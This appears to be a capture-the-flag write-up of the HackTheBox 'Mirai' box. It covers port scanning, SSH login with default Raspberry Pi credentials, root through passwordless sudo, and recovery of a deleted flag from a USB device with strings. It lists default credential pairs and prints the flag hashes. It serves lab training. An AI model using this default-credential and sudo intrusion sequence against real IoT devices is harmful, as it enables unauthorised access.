Skip to main content

HackTheBox Mirai

Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

IP Address: 10.10.10.48

Key Exploitation Techniques:

  • Default SSH credentials for IoT devices (Raspberry Pi)
  • Sudo misconfiguration (NOPASSWD: ALL) for immediate root access
  • File system forensics using df and strings for deleted data recovery
  • USB device analysis and data reconstruction

Enumeration
#

$ nmap -sC -sV -A 10.10.10.48
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35

IoT Device Identification
#

Key Indicators:

  • dnsmasq DNS service (common on IoT devices)
  • lighttpd web server (lightweight, IoT-friendly)
  • SSH version patterns consistent with Raspberry Pi

Web Application Analysis
#

# Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts

# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 -   0B  - /admin  ->  http://mirai.htb/admin/

Accessing /admin reveals a Raspberry Pi dashboard/control interface, confirming IoT device identification.

Exploitation
#

website

Default Credential Testing
#

IoT devices, particularly Raspberry Pi systems, often retain default credentials:

Common Raspberry Pi Defaults:

  • pi:raspberry
  • pi:pi
  • admin:admin
# Test default SSH credentials
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux

Success: Default credentials pi:raspberry provide immediate SSH access.

User Flag Retrieval
#

pi@raspberrypi:~ $ ls
background.jpg  Documents  Music        Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates

pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d

Privilege Escalation
#

Sudo Enumeration
#

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Critical Misconfiguration: User pi has unrestricted sudo access without password requirements.

Root Access
#

pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag Investigation
#

root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Challenge: Original root flag has been deleted, backup exists on USB device.

Digital Forensics & Data Recovery
#

File System Analysis
#

# List mounted filesystems
root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        1.3G  1.1G  143M  89% /
devtmpfs        483M     0  483M   0% /dev
tmpfs           487M     0  487M   0% /dev/shm
tmpfs           487M   13M  475M   3% /run
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           487M     0  487M   0% /sys/fs/cgroup
/dev/mmcblk0p1   41M   21M   19M  53% /boot
/dev/sdb          8.7M   93K  7.9M   2% /media/usbstick

Key Finding: USB stick mounted at /media/usbstick (device /dev/sdb)

USB Device Investigation
#

root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Data Recovery using strings
#

# Use strings to recover deleted data from raw device
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b

Related